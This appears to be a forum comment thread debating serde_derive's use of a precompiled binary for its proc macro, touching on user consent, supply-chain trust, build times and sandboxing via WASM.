So, serde seems to be downloading and running a binary on the system without informing the user and without any user consent. Does anyone have any background information on why this is, and how this is supposed to be a good idea?
dtolnay seems like a smart guy, so I assume there is a reason for this, but it doesn’t feel ok at all.
I hate that I’m linking to Reddit, but I’m just reminded of this.
Some of us knew where all the obsession with dependencies’ compile times will lead, and triggered the alarm sirens, if half-jerkingly, years ago.
Compile times, and more specifically, dependencies compile times, is and has always been the most overblown problem in Rust. We would have some sort of sccache public repositories or something similar by now if it was that big of a problem.
And yes, I’m aware
proc-macro
crates in particular present unique challenges in that field. But that shouldn’t change the general stance towards the supposed “problem”. And it should certainly not trigger such an obsession that would lead to such a horrible “solution” like thisserde
one.I hate that I’m linking to Reddit, but I’m just reminded of this.
OT, but remember you can always use an archived link instead of a live one.
I’m a bit confused, proc macros could always execute arbitrary code on developer machines. As long as the source for the precompiled binary is available (which seems to be the case here), how is this any different than what any other proc macro is doing?
Edit: I should add that any package, macro or not, can also do so in a
build.rs
script.I saw some other crate doing something similar but using wasm, the idea is to sandbox the binary used as a proc macro. So that seems a bit better. Can’t see to find it any more.
EDIT: Found it https://lib.rs/crates/watt
Made by the same guy
serde
is maintained by dtolnay, he is not the original author.
Sandboxing the binary doesn’t protect you. It can still insert malicious code into your application.
It seems it was done to marginally improve serde_derive build times? And just on x86_64-unknown-linux-gnu?
It feels a pretty weird course of action, even if I can understand his point of view his official stance of “My way or the highway” seems a bit stronger than needed, especially considering the amount of problems - both moral and pratical - this modification arises.
I don’t know. If he really feel so strongly about it the only real option would be an hard fork, but a project of that magnitudo and so integrated in the ecosystem is really not easy to both manage or substitute.
Overall it kind of leave a sour taste, even if - I repeat - I understand it is his time and his decision to make.
The same feature is planned for Windows and MacOS. https://github.com/serde-rs/serde/pull/2523#pullrequestreview-1583726636
The build time improvements are so marginal in a production environment where hundreds of crates are built. This decision demonstrates a strange inversion of priorities and smells of premature optimization to me. It’s so odd to see even further optimizations building on this “serde helper process” pattern.
It seems it was done to marginally improve serde_derive build times? And just on x86_64-unknown-linux-gnu?
Indeed. If you use nix instead of compiling in 8 seconds it fails to compile almost instantly.